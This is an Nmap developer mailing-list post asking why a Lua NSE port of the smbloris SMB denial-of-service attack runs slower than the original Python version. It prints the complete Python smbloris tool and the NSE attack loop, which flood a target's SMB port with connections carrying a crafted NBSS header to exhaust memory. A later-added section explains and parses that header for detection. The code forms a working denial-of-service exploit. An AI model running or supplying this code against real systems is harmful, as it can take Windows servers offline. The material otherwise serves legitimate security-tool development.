Nmap Development mailing list archives

NSE-nsock issues?


From: Wong Wai Tuck <wongwaituck () gmail com>
Date: Thu, 24 Aug 2017 15:40:39 +0000

Hey list,

I am currently facing a problem and was hoping someone could clarify this odd
behaviour. I was implementing the smb-smbloris script and I ran into an odd
issue which did not occur in the Python implementation of smbloris, and was
wondering if anyone could provide any insights as to why this is happening.

Here is the original smbloris in Python (written by zerosum0x0):
import sys
import socket
import resource

rhost = sys.argv[1]
rport = sys.argv[2]

# Raise the open-file limit so that ~65k sockets can be held open at once.
resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))

sks = {}

while True:
    for lport in range(1, 65536):
        try:
            # Replace the socket previously bound to this source port.
            if lport in sks:
                sks[lport].close()
            sk = socket.socket()
            sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
            sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sk.bind(('0.0.0.0', lport))
            sk.connect((rhost, int(rport)))
            # NBSS header claiming a 0x1ffff-byte message; the bytes literal
            # works on both Python 2 and Python 3.
            sk.send(b'\x00\x01\xff\xff')

            sks[lport] = sk

        except Exception as e:
            print("%s - Port: %d" % (str(e), lport))

The script executes well.

However, the Lua implementation that I have made for NSE performs poorly:
-- skts, SMBLORIS_PAYLOAD, host_down, timed_out, script_start, timeout,
-- mean, ci and check_alive are defined elsewhere in the full script [2].
local function send_dos(host, port, src_port)
  if host_down then
    return
  end

  -- Close any socket previously bound to this source port so the port can be reused.
  local oldsocket = skts[src_port]
  if oldsocket then
    oldsocket:close()
  end

  local socket = nmap.new_socket()

  local try = nmap.new_try()

  stdnse.debug1("Trying to send from %s", src_port)
  try(socket:bind("0.0.0.0", src_port))

  local status, err = socket:connect(host, port)
  if not status then
    stdnse.debug1("Connect from port %d failed: %s", src_port, err)
    socket:close()
    return
  end
  socket:send(SMBLORIS_PAYLOAD)
  -- Keep the socket open and index it by source port so the next pass
  -- closes and replaces exactly this one.
  skts[src_port] = socket
end

-- the action function
action = function(host, port)
  while not timed_out and not host_down do
    -- using 65000 instead of 65535 prevents crash of too many files open
    for i = 1, 65000, 1 do
      send_dos(host, port, i)

      if i % 1000 == 0 and i <= 60000 then
        -- prevents crash when i >= 61000
        check_alive(host, mean, ci)
      end

      -- has it timed out yet?
      if nmap.clock() - timeout >= script_start then
        stdnse.debug1("Script timed out at %s", timeout)
        timed_out = true
        break
      end
    end
  end
end

You can find the full script in the PR here [2].

Even after commenting out the following lines in the Python implementation
(the only lines that differ from the NSE version):
resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000))
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

the Python implementation still outperforms the NSE implementation, even
though the code is nearly identical. The results can be found here [1].

I have tried playing with the timeouts, using OS-given sockets instead of
assigning my own, and using threads (which ironically made it perform even
worse), and I can't seem to get it to work any better.

Additionally, I am not sure if this is the cause, but I noticed that as more
connections are made, the speed at which the connections are made is much
slower in NSE than in the Python implementation. I am not exactly sure what
the cause is, but if someone could point me in the right direction that would
be helpful! I have tried to adjust the min-rate argument, as well as the
max-parallelism argument (which is apparently used by nsock in NSE, from what
I read in the source), both of which did not have the effect I was hoping
for.

[1]: http://imgur.com/a/AAdG3
[2]: https://github.com/nmap/nmap/pull/983

Wai Tuck
_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
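The four bytes both scripts above send on every connection are a NetBIOS Session Service (NBSS, RFC 1002) header. The following is an added example, written for this page and not part of the original message, the smbloris tool or the nmap PR, that builds and parses that header and shows why "\x00\x01\xff\xff" is the largest length the 17-bit field can carry (the same value Windows reads as a 24-bit length on TCP/445). The function and constant names are this example's own.

```python
"""Added example: NBSS session-message header used by smbloris.

Header layout (RFC 1002, section 4.3.1):
  byte 0      message TYPE (0x00 = session message)
  byte 1      FLAGS, whose low bit (E) extends LENGTH by one bit
  bytes 2-3   LENGTH, big-endian
The payload length is therefore a 17-bit value, at most 0x1FFFF = 131071.
"""
import struct

NBSS_SESSION_MESSAGE = 0x00
NBSS_LENGTH_EXT_BIT = 0x01   # low bit of FLAGS adds bit 16 to the length
NBSS_MAX_LENGTH = 0x1FFFF    # largest length the header can express

# Exactly the bytes the post's scripts send (constructed here for the example).
SMBLORIS_PAYLOAD = b"\x00\x01\xff\xff"


def build_nbss_header(length, msg_type=NBSS_SESSION_MESSAGE):
    """Encode a TYPE/FLAGS/LENGTH header for a payload of `length` bytes."""
    if not 0 <= length <= NBSS_MAX_LENGTH:
        raise ValueError("NBSS length must fit in 17 bits")
    flags = (length >> 16) & NBSS_LENGTH_EXT_BIT
    return struct.pack("!BBH", msg_type, flags, length & 0xFFFF)


def parse_nbss_header(data):
    """Return (msg_type, length) from the first four bytes of `data`."""
    if len(data) < 4:
        raise ValueError("need at least 4 bytes of NBSS header")
    msg_type, flags, low = struct.unpack("!BBH", data[:4])
    length = ((flags & NBSS_LENGTH_EXT_BIT) << 16) | low
    return msg_type, length


def claimed_bytes(payload, connections):
    """Total bytes a server would buffer if it honoured this header once per
    connection; smbloris holds one connection per source port (up to 65535)."""
    _, length = parse_nbss_header(payload)
    return length * connections


if __name__ == "__main__":
    msg_type, length = parse_nbss_header(SMBLORIS_PAYLOAD)
    print("type=%#x length=%d (%d KiB)" % (msg_type, length, length // 1024))
    print("header for max length:", build_nbss_header(NBSS_MAX_LENGTH).hex())
    print("claimed over 65535 connections: %d bytes" %
          claimed_bytes(SMBLORIS_PAYLOAD, 65535))
```

The parser is the check a practitioner wants when writing a detection or a reply handler: a session message whose header claims 131071 bytes and is then followed by nothing is the signature of this traffic, and the builder shows that no larger length can be encoded, so the payload in both scripts is already the worst case.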
